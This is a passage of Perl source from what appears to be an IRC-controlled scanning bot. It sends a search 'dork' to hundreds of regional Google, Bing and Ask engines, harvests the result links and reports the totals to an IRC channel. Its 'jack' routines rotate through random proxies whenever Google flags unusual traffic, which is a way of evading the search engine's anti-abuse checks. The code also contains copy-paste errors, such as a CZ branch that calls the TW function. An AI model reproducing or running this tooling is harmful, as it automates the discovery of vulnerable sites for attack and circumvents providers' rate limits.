= &googleus($dork); push(@total,@googleus); } if ($engine eq "googleINFO") { my @googleinfo = &googleinfo($dork); push(@total,@googleinfo); } if ($engine eq "googleIN") { my @googlein = &googlein($dork); push(@total,@googlein); } if ($engine eq "googleMY") { my @googlemy = &googlemy($dork); push(@total,@googlemy); } if ($engine eq "googleSK") { my @googlesk = &googlesk($dork); push(@total,@googlesk); } if ($engine eq "googleTR") { my @googletr = &googletr($dork); push(@total,@googletr); } if ($engine eq "googleEDU") { my @googleedu = &googleedu($dork); push(@total,@googleedu); } if ($engine eq "googleNO") { my @googleno = &googleno($dork); push(@total,@googleno); } if ($engine eq "googlePL") { my @googlepl = &googlepl($dork); push(@total,@googlepl); } if ($engine eq "googleID") { my @googleid = &googleid($dork); push(@total,@googleid); } if ($engine eq "googleTH") { my @googleth = &googleth($dork); push(@total,@googleth); } if ($engine eq "googleAR") { my @googlear = &googlear($dork); push(@total,@googlear); } if ($engine eq "googleES") { my @googlees = &googlees($dork); push(@total,@googlees); } if ($engine eq "googleVE") { my @googleve = &googleve($dork); push(@total,@googleve); } if ($engine eq "googleRO") { my @googlero = &googlero($dork); push(@total,@googlero); } if ($engine eq "googleBIZ") { my @googlebiz = &googlebiz($dork); push(@total,@googlebiz); } if ($engine eq "googleCN") { my @googlecn = &googlecn($dork); push(@total,@googlecn); } if ($engine eq "googleKR") { my @googlekr = &googlekr($dork); push(@total,@googlekr); } if ($engine eq "googleZA") { my @googleza = &googleza($dork); push(@total,@googleza); } if ($engine eq "googleVN") { my @googlevn = &googlevn($dork); push(@total,@googlevn); } if ($engine eq "googleSI") { my @googlesi = &googlesi($dork); push(@total,@googlesi); } if ($engine eq "googleEU") { my @googleeu = &googleeu($dork); push(@total,@googleeu); } if ($engine eq "googleBE") { my @googlebe = &googlebe($dork); push(@total,@googlebe); } if ($engine eq "googleHU") { my @googlehu = &googlehu($dork); push(@total,@googlehu); } if ($engine eq "googleLV") { my @googlelv = &googlelv($dork); push(@total,@googlelv); } if ($engine eq "googleUA") { my @googleua = &googleua($dork); push(@total,@googleua); } if ($engine eq "googleTV") { my @googletv = &googletv($dork); push(@total,@googletv); } if ($engine eq "googleIE") { my @googleie = &googleie($dork); push(@total,@googleie); } if ($engine eq "googleCO") { my @googleco = &googleco($dork); push(@total,@googleco); } if ($engine eq "googlePRO") { my @googlepro = &googlepro($dork); push(@total,@googlepro); } if ($engine eq "googleNAME") { my @googlename = &googlename($dork); push(@total,@googlename); } if ($engine eq "googleBY") { my @googleby = &googleby($dork); push(@total,@googleby); } if ($engine eq "googleJP") { my @googlejp = &googlejp($dork); push(@total,@googlejp); } if ($engine eq "googlePH") { my @googleph = &googleph($dork); push(@total,@googleph); } if ($engine eq "googleAU") { my @googleau = &googleau($dork); push(@total,@googleau); } if ($engine eq "googleCAT") { my @googlecat = &googlecat($dork); push(@total,@googlecat); } if ($engine eq "googleHK") { my @googlehk = &googlehk($dork); push(@total,@googlehk); } if ($engine eq "googleAT") { my @googleat = &googleat($dork); push(@total,@googleat); } if ($engine eq "googleSU") { my @googlesu = &googlesu($dork); push(@total,@googlesu); } if ($engine eq "googleMOBI") { my @googlemobi = &googlemobi($dork); push(@total,@googlemobi); } if ($engine eq "googleASIA") { my @googleasia = &googleasia($dork); push(@total,@googleasia); } if ($engine eq "googleCOOP") { my @googlecoop = &googlecoop($dork); push(@total,@googlecoop); } if ($engine eq "googleAE") { my @googleae = &googleae($dork); push(@total,@googleae); } if ($engine eq "googleMN") { my @googlemn = &googlemn($dork); push(@total,@googlemn); } if ($engine eq "googleBG") { my @googlebg = &googlebg($dork); push(@total,@googlebg); } if ($engine eq "googleNZ") { my @googlenz = &googlenz($dork); push(@total,@googlenz); } if ($engine eq "googleEE") { my @googleee = &googleee($dork); push(@total,@googleee); } if ($engine eq "googleGR") { my @googlegr = &googlegr($dork); push(@total,@googlegr); } if ($engine eq "googlePT") { my @googlept = &googlept($dork); push(@total,@googlept); } if ($engine eq "googleTN") { my @googletn = &googletn($dork); push(@total,@googletn); } if ($engine eq "googleKE") { my @googleke = &googleke($dork); push(@total,@googleke); } if ($engine eq "googleFI") { my @googlefi = &googlefi($dork); push(@total,@googlefi); } if ($engine eq "googleHR") { my @googlehr = &googlehr($dork); push(@total,@googlehr); } if ($engine eq "googleCH") { my @googlech = &googlech($dork); push(@total,@googlech); } if ($engine eq "googleIL") { my @googleil = &googleil($dork); push(@total,@googleil); } if ($engine eq "googlePE") { my @googlepe = &googlepe($dork); push(@total,@googlepe); } if ($engine eq "googleMD") { my @googlemd = &googlemd($dork); push(@total,@googlemd); } if ($engine eq "googleCC") { my @googlecc = &googlecc($dork); push(@total,@googlecc); } if ($engine eq "googleTEL") { my @googletel = &googletel($dork); push(@total,@googletel); } if ($engine eq "googleIM") { my @googleim = &googleim($dork); push(@total,@googleim); } if ($engine eq "googleKZ") { my @googlekz = &googlekz($dork); push(@total,@googlekz); } if ($engine eq "googleUY") { my @googleuy = &googleuy($dork); push(@total,@googleuy); } if ($engine eq "googleMIL") { my @googlemil = &googlemil($dork); push(@total,@googlemil); } if ($engine eq "googlePK") { my @googlepk = &googlepk($dork); push(@total,@googlepk); } if ($engine eq "googleIS") { my @googleis = &googleis($dork); push(@total,@googleis); } if ($engine eq "googleUZ") { my @googleuz = &googleuz($dork); push(@total,@googleuz); } if ($engine eq "googleNG") { my @googleng = &googleng($dork); push(@total,@googleng); } if ($engine eq "googleTRAVEL") { my @googletravel = &googletravel($dork); push(@total,@googletravel); } if ($engine eq "googleSA") { my @googlesa = &googlesa($dork); push(@total,@googlesa); } if ($engine eq "googleDO") { my @googledo = &googledo($dork); push(@total,@googledo); } if ($engine eq "googleAM") { my @googleam = &googleam($dork); push(@total,@googleam); } if ($engine eq "googleEG") { my @googleeg = &googleeg($dork); push(@total,@googleeg); } if ($engine eq "googleFM") { my @googlefm = &googlefm($dork); push(@total,@googlefm); } if ($engine eq "googleGE") { my @googlege = &googlege($dork); push(@total,@googlege); } if ($engine eq "googleKY") { my @googleky = &googleky($dork); push(@total,@googleky); } if ($engine eq "googleLU") { my @googlelu = &googlelu($dork); push(@total,@googlelu); } if ($engine eq "googleMK") { my @googlemk = &googlemk($dork); push(@total,@googlemk); } if ($engine eq "googleQA") { my @googleqa = &googleqa($dork); push(@total,@googleqa); } if ($engine eq "googleSG") { my @googlesg = &googlesg($dork); push(@total,@googlesg); } if ($engine eq "googleSY") { my @googlesy = &googlesy($dork); push(@total,@googlesy); } if ($engine eq "googleLA") { my @googlela = &googlela($dork); push(@total,@googlela); } if ($engine eq "googleAZ") { my @googleaz = &googleaz($dork); push(@total,@googleaz); } if ($engine eq "googleCY") { my @googlecy = &googlecy($dork); push(@total,@googlecy); } if ($engine eq "googleBD") { my @googlebd = &googlebd($dork); push(@total,@googlebd); } if ($engine eq "googleSN") { my @googlesn = &googlesn($dork); push(@total,@googlesn); } if ($engine eq "googleMUSEUM") { my @googlemuseum = &googlemuseum($dork); push(@total,@googlemuseum); } if ($engine eq "googleGOV") { my @googlegov = &googlegov($dork); push(@total,@googlegov); } if ($engine eq "googleTK") { my @googletk = &googletk($dork); push(@total,@googletk); } if ($engine eq "googleNU") { my @googlenu = &googlenu($dork); push(@total,@googlenu); } if ($engine eq "googleZM") { my @googlezm = &googlezm($dork); push(@total,@googlezm); } if ($engine eq "googleYE") { my @googleye = &googleye($dork); push(@total,@googleye); } if ($engine eq "googleCU") { my @googlecu = &googlecu($dork); push(@total,@googlecu); } if ($engine eq "googleTO") { my @googleto = &googleto($dork); push(@total,@googleto); } if ($engine eq "googleTZ") { my @googletz = &googletz($dork); push(@total,@googletz); } if ($engine eq "googleRS") { my @googlers = &googlers($dork); push(@total,@googlers); } if ($engine eq "googlePM") { my @googlepm = &googlepm($dork); push(@total,@googlepm); } if ($engine eq "googleLT") { my @googlelt = &googlelt($dork); push(@total,@googlelt); } if ($engine eq "googleMZ") { my @googlemz = &googlemz($dork); push(@total,@googlemz); } if ($engine eq "googleMA") { my @googlema = &googlema($dork); push(@total,@googlema); } if ($engine eq "googleAL") { my @googleal = &googleal($dork); push(@total,@googleal); } if ($engine eq "googlePA") { my @googlepa = &googlepa($dork); push(@total,@googlepa); } if ($engine eq "googleEC") { my @googleec = &googleec($dork); push(@total,@googleec); } if ($engine eq "googleKG") { my @googlekg = &googlekg($dork); push(@total,@googlekg); } if ($engine eq "googleUZ") { my @googleuz = &googleuz($dork); push(@total,@googleuz); } if ($engine eq "googleSV") { my @googlesv = &googlesv($dork); push(@total,@googlesv); } if ($engine eq "GooGLeCA") { my @googleCA = googleCA($dork); push(@total,@googleCA); } if ($engine eq "GooGLeDE") { my @googleDE = googleDE($dork); push(@total,@googleDE); } if ($engine eq "GooGLeUK") { my @googleUK = googleUK($dork); push(@total,@googleUK); } if ($engine eq "GooGLeFR") { my @googleFR = googleFR($dork); push(@total,@googleFR); } if ($engine eq "GooGLeES") { my @googleES = googleES($dork); push(@total,@googleES); } if ($engine eq "GooGLeIT") { my @googleIT = googleIT($dork); push(@total,@googleIT); } if ($engine eq "GooGLeNL") { my @googleNL = googleNL($dork); push(@total,@googleNL); } if ($engine eq "GooGLeBE") { my @googleBE = googleBE($dork); push(@total,@googleBE); } if ($engine eq "GooGLeCH") { my @googleCH = googleCH($dork); push(@total,@googleCH); } if ($engine eq "GooGLeSE") { my @googleSE = googleSE($dork); push(@total,@googleSE); } if ($engine eq "GooGLeDK") { my @googleDK = googleDK($dork); push(@total,@googleDK); } if ($engine eq "GooGLeNO") { my @googleNO = googleNO($dork); push(@total,@googleNO); } if ($engine eq "GooGLeNZ") { my @googleNZ = googleNZ($dork); push(@total,@googleNZ); } if ($engine eq "GooGLeIE") { my @googleIE = googleIE($dork); push(@total,@googleIE); } if ($engine eq "GooGLeBR") { my @googleBR = googleBR($dork); push(@total,@googleBR); } if ($engine eq "GooGLeAR") { my @googleAR = googleAR($dork); push(@total,@googleAR); } if ($engine eq "GooGLeCO") { my @googleCO = googleCO($dork); push(@total,@googleCO); } if ($engine eq "GooGLeCU") { my @googleCU = googleCU($dork); push(@total,@googleCU); } if ($engine eq "GooGLeCL") { my @googleCL = googleCL($dork); push(@total,@googleCL); } if ($engine eq "GooGLeMX") { my @googleMX = googleMX($dork); push(@total,@googleMX); } if ($engine eq "GooGLeAU") { my @googleAU = googleAU($dork); push(@total,@googleAU); } if ($engine eq "GooGLeRU") { my @googleRU = googleRU($dork); push(@total,@googleRU); } if ($engine eq "GooGLeAT") { my @googleAT = googleAT($dork); push(@total,@googleAT); } if ($engine eq "GooGLePL") { my @googlePL = googlePL($dork); push(@total,@googlePL); } if ($engine eq "GooGLeIL") { my @googleIL = googleIL($dork); push(@total,@googleIL); } if ($engine eq "GooGLeTR") { my @googleTR = googleTR($dork); push(@total,@googleTR); } if ($engine eq "GooGLeUA") { my @googleUA = googleUA($dork); push(@total,@googleUA); } if ($engine eq "GooGLeGR") { my @googleGR = googleGR($dork); push(@total,@googleGR); } if ($engine eq "GooGLeJP") { my @googleJP = googleJP($dork); push(@total,@googleJP); } if ($engine eq "GooGLeCN") { my @googleCN = googleCN($dork); push(@total,@googleCN); } if ($engine eq "GooGLeMY") { my @googleMY = googleMY($dork); push(@total,@googleMY); } if ($engine eq "GooGLeTH") { my @googleTH = googleTH($dork); push(@total,@googleTH); } if ($engine eq "GooGLeIN") { my @googleIN = googleIN($dork); push(@total,@googleIN); } if ($engine eq "GooGLeKR") { my @googleKR = googleKR($dork); push(@total,@googleKR); } if ($engine eq "GooGLeRO") { my @googleRO = googleRO($dork); push(@total,@googleRO); } if ($engine eq "GooGLeTW") { my @googleTW = googleTW($dork); push(@total,@googleTW); } if ($engine eq "GooGLeZA") { my @googleZA = googleZA($dork); push(@total,@googleZA); } if ($engine eq "GooGLePT") { my @googlePT = googlePT($dork); push(@total,@googlePT); } if ($engine eq "GooGLeCZ") { my @googleCZ = googleTW($dork); push(@total,@googleTW); } if ($engine eq "GooGLeEU") { my @googleEU = googleEU($dork); push(@total,@googleEU); } if ($engine eq "GooGLeHU") { my @googleHU = googleHU($dork); push(@total,@googleHU); } if ($engine eq "GooGLeID") { my @googleID = googleID($dork); push(@total,@googleID); } if ($engine eq "GooGLePH") { my @googlePH = googlePH($dork); push(@total,@googlePH); } if ($engine eq "GooGLeSI") { my @googleSI = googleSI($dork); push(@total,@googleSI); } if ($engine eq "GooGLeCAT") { my @googleCAT = googleCAT($dork); push(@total,@googleCAT); } if ($engine eq "GooGLeBO") { my @googleBO = googleBO($dork); push(@total,@googleBO); } if ($engine eq "GooGLeBA") { my @googleBA = googleBA($dork); push(@total,@googleBA); } if ($engine eq "GooGLeCR") { my @googleCR = googleCR($dork); push(@total,@googleCR); } if ($engine eq "GooGLeHR") { my @googleHR = googleHR($dork); push(@total,@googleHR); } if ($engine eq "GooGLeEC") { my @googleEC = googleEC($dork); push(@total,@googleEC); } if ($engine eq "GooGLeFI") { my @googleFI = googleFI($dork); push(@total,@googleFI); } if ($engine eq "GooGLeHN") { my @googleHN = googleHN($dork); push(@total,@googleHN); } if ($engine eq "GooGLeHK") { my @googleHK = googleHK($dork); push(@total,@googleHK); } if ($engine eq "GooGLeIS") { my @googleIS = googleIS($dork); push(@total,@googleIS); } if ($engine eq "GooGLeKZ") { my @googleKZ = googleKZ($dork); push(@total,@googleKZ); } if ($engine eq "GooGLeKE") { my @googleKE = googleKE($dork); push(@total,@googleKE); } if ($engine eq "GooGLeLV") { my @googleLV = googleLV($dork); push(@total,@googleLV); } if ($engine eq "GooGLeLT") { my @googleLT = googleLT($dork); push(@total,@googleLT); } if ($engine eq "GooGLeLU") { my @googleLU = googleLU($dork); push(@total,@googleLU); } if ($engine eq "GooGLeMW") { my @googleMW = googleMW($dork); push(@total,@googleMW); } if ($engine eq "GooGLeMT") { my @googleMT = googleMT($dork); push(@total,@googleMT); } if ($engine eq "GooGLeMA") { my @googleMA = googleMA($dork); push(@total,@googleMA); } if ($engine eq "GooGLeNP") { my @googleNP = googleNP($dork); push(@total,@googleNP); } if ($engine eq "GooGLePK") { my @googlePK = googlePK($dork); push(@total,@googlePK); } if ($engine eq "GooGLePR") { my @googlePR = googlePR($dork); push(@total,@googlePR); } if ($engine eq "GooGLeSA") { my @googleSA = googleSA($dork); push(@total,@googleSA); } if ($engine eq "GooGLeSN") { my @googleSN = googleSN($dork); push(@total,@googleSN); } if ($engine eq "GooGLeSG") { my @googleSG = googleSG($dork); push(@total,@googleSG); } if ($engine eq "GooGLeSK") { my @googleSK = googleSK($dork); push(@total,@googleSK); } if ($engine eq "GooGLeCH") { my @googleCH = googleCH($dork); push(@total,@googleCH); } if ($engine eq "GooGLeVE") { my @googleVE = googleVE($dork); push(@total,@googleVE); } if ($engine eq "GooGLeVN") { my @googleVN = googleVN($dork); push(@total,@googleVN); } if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); } if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); } if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); } if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); } if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); } if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); } if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); } if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); } if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); } if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); } if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); } if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); } if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); } if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); } if ($engine eq "Yahoo2") { my @yahoo2 = &yahoo2($dork); push(@total,@yahoo2); } if ($engine eq "KvaSiR") { my @kvasir = &kvasir($dork); push(@total,@kvasir); } if ($engine eq "QuinT") { my @quint = &quint($dork); push(@total,@quint); } if ($engine eq "Pagina") { my @pagina = &pagina($dork); push(@total,@pagina); } if ($engine eq "Clix") { my @clix = &clix($dork); push(@total,@clix); } if ($engine eq "ask2") { my @ask2 = &ask2($dork); push(@total,@ask2); } if ($engine eq "AsKCA") { my @askCA = askCA($dork); push(@total,@askCA); } if ($engine eq "AsKDE") { my @askDE = askDE($dork); push(@total,@askDE); } if ($engine eq "AsKIT") { my @askIT = askIT($dork); push(@total,@askIT); } if ($engine eq "AsKUK") { my @askUK = askUK($dork); push(@total,@askUK); } if ($engine eq "AsKFR") { my @askFR = askFR($dork); push(@total,@askFR); } if ($engine eq "AsKES") { my @askES = askES($dork); push(@total,@askES); } if ($engine eq "AsKRU") { my @askRU = askRU($dork); push(@total,@askRU); } if ($engine eq "AsKNL") { my @askNL = askNL($dork); push(@total,@askNL); } if ($engine eq "AsKEU") { my @askEU = askEU($dork); push(@total,@askEU); } if ($engine eq "AsKPL") { my @askPL = askPL($dork); push(@total,@askPL); } if ($engine eq "AsKAT") { my @askAT = askAT($dork); push(@total,@askAT); } if ($engine eq "AsKSE") { my @askSE = askSE($dork); push(@total,@askSE); } if ($engine eq "AsKDK") { my @askDK = askDK($dork); push(@total,@askDK); } if ($engine eq "AsKNO") { my @askNO = askNO($dork); push(@total,@askNO); } if ($engine eq "AsKAU") { my @askAU = askAU($dork); push(@total,@askAU); } if ($engine eq "AsKBR") { my @askBR = askBR($dork); push(@total,@askBR); } if ($engine eq "AsKMX") { my @askMX = askMX($dork); push(@total,@askMX); } if ($engine eq "AsKJP") { my @askJP = askJP($dork); push(@total,@askJP); } if ($engine eq "BingDE") { my @bingDE = bingDE($dork); push(@total,@bingDE); } if ($engine eq "BingUK") { my @bingUK = bingUK($dork); push(@total,@bingUK); } if ($engine eq "BingCA") { my @bingCA = bingCA($dork); push(@total,@bingCA); } if ($engine eq "BingBR") { my @bingBR = bingBR($dork); push(@total,@bingBR); } if ($engine eq "BingFR") { my @bingFR = bingFR($dork); push(@total,@bingFR); } if ($engine eq "BingES") { my @bingES = bingES($dork); push(@total,@bingES); } if ($engine eq "BingIT") { my @bingIT = bingIT($dork); push(@total,@bingIT); } if ($engine eq "BingBE") { my @bingBE = bingBE($dork); push(@total,@bingBE); } if ($engine eq "BingNL") { my @bingNL = bingNL($dork); push(@total,@bingNL); } if ($engine eq "BingPT") { my @bingPT = bingPT($dork); push(@total,@bingPT); } if ($engine eq "BingNO") { my @bingNO = bingNO($dork); push(@total,@bingNO); } if ($engine eq "BingDK") { my @bingDK = bingDK($dork); push(@total,@bingDK); } if ($engine eq "BingSE") { my @bingSE = bingSE($dork); push(@total,@bingSE); } if ($engine eq "BingCH") { my @bingCH = bingCH($dork); push(@total,@bingCH); } if ($engine eq "BingNZ") { my @bingNZ = bingNZ($dork); push(@total,@bingNZ); } if ($engine eq "BingRU") { my @bingRU = bingRU($dork); push(@total,@bingRU); } if ($engine eq "BingJP") { my @bingJP = bingJP($dork); push(@total,@bingJP); } if ($engine eq "BingCN") { my @bingCN = bingCN($dork); push(@total,@bingCN); } if ($engine eq "BingKR") { my @bingKR = bingKR($dork); push(@total,@bingKR); } if ($engine eq "BingMX") { my @bingMX = bingMX($dork); push(@total,@bingMX); } if ($engine eq "BingAR") { my @bingAR = bingAR($dork); push(@total,@bingAR); } if ($engine eq "BingCL") { my @bingCL = bingCL($dork); push(@total,@bingCL); } if ($engine eq "BingAU") { my @bingAU = bingAU($dork); push(@total,@bingAU); } if ($engine eq "BingAE") { my @bingAE = bingAE($dork); push(@total,@bingAE); } if ($engine eq "BingAT") { my @bingAT = bingAT($dork); push(@total,@bingAT); } if ($engine eq "BingCZ") { my @bingCZ = bingCZ($dork); push(@total,@bingCZ); } if ($engine eq "BingEU") { my @bingEU = bingEU($dork); push(@total,@bingEU); } if ($engine eq "BingHU") { my @bingHU = bingHU($dork); push(@total,@bingHU); } if ($engine eq "BingID") { my @bingID = bingID($dork); push(@total,@bingID); } if ($engine eq "BingIL") { my @bingIL = bingIL($dork); push(@total,@bingIL); } if ($engine eq "BingIN") { my @bingIN = bingIN($dork); push(@total,@bingIN); } if ($engine eq "BingINFO") { my @bingINFO = bingINFO($dork); push(@total,@bingINFO); } if ($engine eq "BingIR") { my @bingIR = bingIR($dork); push(@total,@bingIR); } if ($engine eq "BingMY") { my @bingMY = bingMY($dork); push(@total,@bingMY); } if ($engine eq "BingNET") { my @bingNET = bingNET($dork); push(@total,@bingNET); } if ($engine eq "BingORG") { my @bingORG = bingORG($dork); push(@total,@bingORG); } if ($engine eq "BingPH") { my @bingPH = bingPH($dork); push(@total,@bingPH); } if ($engine eq "BingPL") { my @bingPL = bingPL($dork); push(@total,@bingPL); } if ($engine eq "BingRO") { my @bingRO = bingRO($dork); push(@total,@bingRO); } if ($engine eq "BingTH") { my @bingTH = bingTH($dork); push(@total,@bingTH); } if ($engine eq "BingUA") { my @bingUA = bingUA($dork); push(@total,@bingUA); } if ($engine eq "BingUS") { my @bingUS = bingUS($dork); push(@total,@bingUS); } if ($engine eq "BingSI") { my @bingSI = bingSI($dork); push(@total,@bingSI); } if ($engine eq "BingBIZ") { my @bingBIZ = bingBIZ($dork); push(@total,@bingBIZ); } if ($engine eq "BingXXX") { my @bingXXX = bingXXX($dork); push(@total,@bingXXX); } if ($engine eq "BingTV") { my @bingTV = bingTV($dork); push(@total,@bingTV); } if ($engine eq "BingCC") { my @bingCC = bingCC($dork); push(@total,@bingCC); } if ($engine eq "BingMIL") { my @bingMIL = bingMIL($dork); push(@total,@bingMIL); } if ($engine eq "BingASIA") { my @bingASIA = bingASIA($dork); push(@total,@bingASIA); } if ($engine eq "BingNAME") { my @bingNAME = bingNAME($dork); push(@total,@bingNAME); } if ($engine eq "BingPRO") { my @bingPRO = bingPRO($dork); push(@total,@bingPRO); } if ($engine eq "BingTRAVEL") { my @bingTRAVEL = bingTRAVEL($dork); push(@total,@bingTRAVEL); } if ($engine eq "BingJOBS") { my @bingJOBS = bingJOBS($dork); push(@total,@bingJOBS); } if ($engine eq "BingMOBI") { my @bingMOBI = bingMOBI($dork); push(@total,@bingMOBI); } if ($engine eq "BingAERO") { my @bingAERO = bingAERO($dork); push(@total,@bingAERO); } if ($engine eq "BingCAT") { my @bingCAT = bingCAT($dork); push(@total,@bingCAT); } if ($engine eq "BingCOOP") { my @bingCOOP = bingCOOP($dork); push(@total,@bingCOOP); } if ($engine eq "BingEDU") { my @bingEDU = bingEDU($dork); push(@total,@bingEDU); } if ($engine eq "BingGOV") { my @bingGOV = bingGOV($dork); push(@total,@bingGOV); } if ($engine eq "BingBO") { my @bingBO = bingBO($dork); push(@total,@bingBO); } if ($engine eq "BingBA") { my @bingBA = bingBA($dork); push(@total,@bingBA); } if ($engine eq "BingBW") { my @bingBW = bingBW($dork); push(@total,@bingBW); } if ($engine eq "BingBG") { my @bingBG = bingBG($dork); push(@total,@bingBG); } if ($engine eq "BingCO") { my @bingCO = bingCO($dork); push(@total,@bingCO); } if ($engine eq "BingCR") { my @bingCR = bingCR($dork); push(@total,@bingCR); } if ($engine eq "BingHR") { my @bingHR = bingHR($dork); push(@total,@bingHR); } if ($engine eq "BingDO") { my @bingDO = bingDO($dork); push(@total,@bingDO); } if ($engine eq "BingEC") { my @bingEC = bingEC($dork); push(@total,@bingEC); } if ($engine eq "BingGR") { my @bingGR = bingGR($dork); push(@total,@bingGR); } if ($engine eq "BingHN") { my @bingHN = bingHN($dork); push(@total,@bingHN); } if ($engine eq "BingHK") { my @bingHK = bingHK($dork); push(@total,@bingHK); } if ($engine eq "BingIS") { my @bingIS = bingIS($dork); push(@total,@bingIS); } if ($engine eq "BingIE") { my @bingIE = bingIE($dork); push(@total,@bingIE); } if ($engine eq "BingKZ") { my @bingKZ = bingKZ($dork); push(@total,@bingKZ); } if ($engine eq "BingKE") { my @bingKE = bingKE($dork); push(@total,@bingKE); } if ($engine eq "BingKG") { my @bingKG = bingKG($dork); push(@total,@bingKG); } if ($engine eq "BingLV") { my @bingLV = bingLV($dork); push(@total,@bingLV); } if ($engine eq "BingLY") { my @bingLY = bingLY($dork); push(@total,@bingLY); } if ($engine eq "BingLT") { my @bingLT = bingLT($dork); push(@total,@bingLT); } if ($engine eq "BingLU") { my @bingLU = bingLU($dork); push(@total,@bingLU); } if ($engine eq "BingMA") { my @bingMA = bingMA($dork); push(@total,@bingMA); } if ($engine eq "BingNP") { my @bingNP = bingNP($dork); push(@total,@bingNP); } if ($engine eq "BingPK") { my @bingPK = bingPK($dork); push(@total,@bingPK); } if ($engine eq "BingPR") { my @bingPR = bingPR($dork); push(@total,@bingPR); } if ($engine eq "BingSG") { my @bingSG = bingSG($dork); push(@total,@bingSG); } if ($engine eq "BingSK") { my @bingSK = bingSK($dork); push(@total,@bingSK); } if ($engine eq "BingZA") { my @bingZA = bingZA($dork); push(@total,@bingZA); } if ($engine eq "BingLK") { my @bingLK = bingLK($dork); push(@total,@bingLK); } if ($engine eq "BingTW") { my @bingTW = bingTW($dork); push(@total,@bingTW); } if ($engine eq "BingTR") { my @bingTR = bingTR($dork); push(@total,@bingTR); } if ($engine eq "BingVE") { my @bingVE = bingVE($dork); push(@total,@bingVE); } if ($engine eq "BingVN") { my @bingVN = bingVN($dork); push(@total,@bingVN); } if ($engine eq "BingMUSEUM") { my @bingMUSEUM = bingMUSEUM($dork); push(@total,@bingMUSEUM); } @clean = clean(@total); #if (scalar(@total) != 0) { if (@clean > 0){ &msg("$channel","![3X]! [9 Process3 |12 $$ ] [2 ".scalar(@total)."3 |9 ".scalar(@clean)." ]"); } return @clean; } ######################################### sub isFound() { my $status = 0; my $link = $_[0]; my $reqexp = $_[1]; my $res = get_content($link); if ($res =~ /$reqexp/) { $status = 1 } return $status; } sub get_content() { my $url = $_[0]; my $ua = LWP::UserAgent->new(agent => $uagent); $ua->timeout($timot); my $req = HTTP::Request->new(GET => $url); my $res = $ua->request($req); return $res->content; } ######################################### SEARCH ENGINE sub jack() { my @list; my $key = $_[0]; my $jackx = $_[1]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jackx() { my @list; my $key = $_[0]; my $jackx = $_[1]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jackx.uri_escape($key)."&num=100&start=".$i); my $res = &search_engine_query($search); while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack1() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack1.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack1 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack1.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack2() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack2.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack2 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack2.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack3() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack3.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack3 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack3.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack4() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack4.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) { $rand1 = $lobex[rand(scalar(@lobex))]; $jack4 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q="; $search = ($jack4.uri_escape($key)."&num=100&start=".$i); $res = &search_engine_query($search); } while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { my $link = $1; if ($link !~ /google/){ my @grep = &links($link); push(@list,@grep); } } } return @list; } sub jack5() { my @list; my $key = $_[0]; for (my $i=0; $i<=500; $i+=10){ my $search = ($jack5.uri_escape($key)."&num=100&start=".$i); my $res = search_engine_query($search); if($res =~ 